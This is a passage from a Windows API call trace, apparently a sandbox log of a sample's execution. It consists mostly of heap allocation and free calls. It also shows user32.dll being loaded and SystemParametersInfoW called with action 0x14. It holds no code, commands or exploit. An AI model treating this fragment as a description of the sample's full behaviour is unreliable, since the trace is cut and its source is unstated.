hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0292.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0292.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0292.617] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0292.617] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0292.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0292.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0292.617] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0292.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0292.618] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0292.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0292.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0292.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0292.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0292.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0292.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0292.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0292.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0292.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0292.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0292.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0292.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0292.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0292.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0292.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0292.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0292.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0292.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0292.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0292.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0292.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0292.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0292.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0292.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0292.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0292.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0292.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0292.622] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0292.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0292.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0292.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0292.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0292.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0292.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0292.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0292.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0292.623] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0292.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0292.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0292.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0292.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0292.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0292.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0292.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0292.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0292.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0292.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0292.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0292.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0292.624] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0292.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0292.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0292.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0292.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0292.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0292.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0292.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0292.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0292.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0292.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0292.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0292.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0292.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0292.714] FreeLibrary (hLibModule=0x74f40000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0292.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 